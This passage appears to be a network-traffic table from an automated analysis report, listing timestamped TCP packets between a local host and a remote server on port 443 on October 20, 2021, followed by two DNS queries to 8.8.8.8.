                                                              Oct 20, 2021 15:12:10.232809067 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.232923985 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.232944012 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.232988119 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.233071089 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.269105911 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.269145012 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.269368887 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.269397020 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.271883011 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.436548948 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.436593056 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.436793089 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.436810970 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.436949015 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.472310066 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.472343922 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.472428083 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.472445965 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.472551107 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.641746998 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.641779900 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.641976118 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.642002106 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.642051935 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.643449068 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.650343895 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.650398970 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.650432110 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.650474072 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.650556087 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.656586885 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.656631947 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.788908005 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.788954020 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.789304972 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.790129900 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.790157080 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.904614925 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.907011986 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.908690929 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.908711910 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.912336111 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.912354946 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.615567923 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.615597963 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.615621090 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.615658045 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:11.615683079 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.615694046 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:11.615699053 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.615741968 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:11.780949116 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.780982018 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.781054974 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:11.781075954 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.784914970 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:11.818072081 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.818109989 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.819366932 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:11.819386959 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.819447041 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:11.987236023 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.987271070 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.987343073 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:11.987359047 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.987386942 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:11.987412930 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.189318895 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.189357996 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.189812899 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.189826965 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.189884901 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.397382975 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.397401094 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.397447109 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.400253057 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.400281906 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.400585890 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.434607983 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.434643984 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.434731960 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.434752941 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.434855938 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.612653017 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.612679958 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.615899086 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.615928888 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.615947962 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.616388083 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.822381973 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.822416067 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.825484991 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.825515985 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.826525927 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.860184908 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.860224009 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.866394997 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:12.866417885 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:12.868021011 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.007164001 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.007194042 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.008735895 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.008757114 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.009177923 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.044493914 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.044528008 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.044622898 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.044644117 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.044672966 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.045346975 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.196120024 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.196149111 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.197027922 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.197240114 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.197263002 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.197274923 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.197938919 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.198229074 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.198245049 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.825256109 CEST49968443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.825293064 CEST4434996831.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.825421095 CEST49968443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.826503038 CEST49968443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.826520920 CEST4434996831.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.936471939 CEST4434996831.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.936741114 CEST49968443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.937686920 CEST49968443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.937695026 CEST4434996831.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:13.940700054 CEST49968443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:13.940715075 CEST4434996831.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:14.386214018 CEST4434996831.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:14.386236906 CEST4434996831.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:14.386312008 CEST4434996831.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:14.394184113 CEST49968443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:14.395205975 CEST49968443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:14.395234108 CEST4434996831.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:14.857882023 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:14.857923985 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:14.858266115 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:14.938184023 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:14.938226938 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:15.050404072 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:15.055325985 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:15.535948992 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:15.536000013 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:15.536308050 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:15.536595106 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:15.540883064 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:15.583144903 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:16.536659956 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:16.536714077 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:16.536748886 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:16.538614035 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:16.538644075 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:16.551147938 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:16.554601908 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:16.837598085 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:16.837613106 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:16.837682009 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:16.841449022 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:16.841475010 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:16.851932049 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:16.851955891 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:16.854151011 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:16.854353905 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:17.114180088 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.114212036 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.119307041 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:17.119333029 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.119348049 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:17.119555950 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:17.412308931 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.412334919 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.412390947 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.413142920 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:17.413170099 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.413465023 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:17.448256016 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.448297977 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.451818943 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:17.460438967 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:17.460462093 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.464982033 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:17.716460943 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.716487885 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.716551065 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.724087000 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:17.724117994 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:17.724186897 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:17.724442005 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.028058052 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.028084040 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.028131962 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.034205914 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.034223080 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.034275055 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.034282923 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.034347057 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.034427881 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.065552950 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.065571070 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.065635920 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.065651894 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.083158970 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.084815025 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.095779896 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.336282969 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.336297989 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.336313963 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.336379051 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.336424112 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.341046095 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.341072083 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.342209101 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.371237040 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.371252060 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.371268988 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.371304989 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.371335030 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.371354103 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.375051975 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.390116930 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.404884100 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.404928923 CEST4434996931.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:18.404942989 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:18.479617119 CEST49969443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:20.444061041 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:20.444087982 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:20.444206953 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:20.445069075 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:20.445084095 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:20.559720993 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:20.559808969 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:20.569035053 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:20.569073915 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:20.574294090 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:20.574320078 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.243057966 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.243088961 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.243194103 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.243212938 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.243242025 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.243285894 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.243313074 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.399446011 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.399477005 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.399665117 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.399691105 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.399769068 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.441349030 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.442933083 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.443368912 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.443391085 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.443403006 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.448762894 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.591243029 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.591296911 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.592006922 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.592077017 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.592252016 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.789295912 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.789335966 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.789419889 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.789443016 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.789458990 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.789485931 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.989392996 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.989427090 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.989605904 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.989630938 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:21.989672899 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:21.989684105 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.026868105 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.026906967 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.027137995 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.027162075 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.027232885 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.185477972 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.185519934 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.185672998 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.185698032 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.185760021 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.379343987 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.379380941 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.379452944 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.379476070 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.379497051 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.379528046 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.417476892 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.417505026 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.417627096 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.417643070 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.417725086 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.572926044 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.572962999 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.573076010 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.573102951 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.573276997 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.610218048 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.610246897 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.610428095 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.610450983 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.610524893 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.773332119 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.773365974 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.773484945 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.773505926 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.773566008 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.774437904 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.774511099 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.774547100 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:22.774621964 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.774642944 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.790515900 CEST49970443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:22.790565014 CEST4434997031.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:24.508604050 CEST49972443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:24.508652925 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:24.508747101 CEST49972443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:24.509975910 CEST49972443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:24.509994030 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:24.627744913 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:24.627888918 CEST49972443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:24.655491114 CEST49972443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:24.655512094 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:24.672024965 CEST49972443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:24.672054052 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:25.154757977 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:25.154792070 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:25.154879093 CEST4434997231.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:25.161797047 CEST49972443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:25.170002937 CEST49972443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:25.170033932 CEST4434997231.220.111.98192.168.2.5

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 20, 2021 15:08:30.124794960 CEST6529653192.168.2.58.8.8.8
                                                              Oct 20, 2021 15:08:34.783061028 CEST5696953192.168.2.58.8.8.8
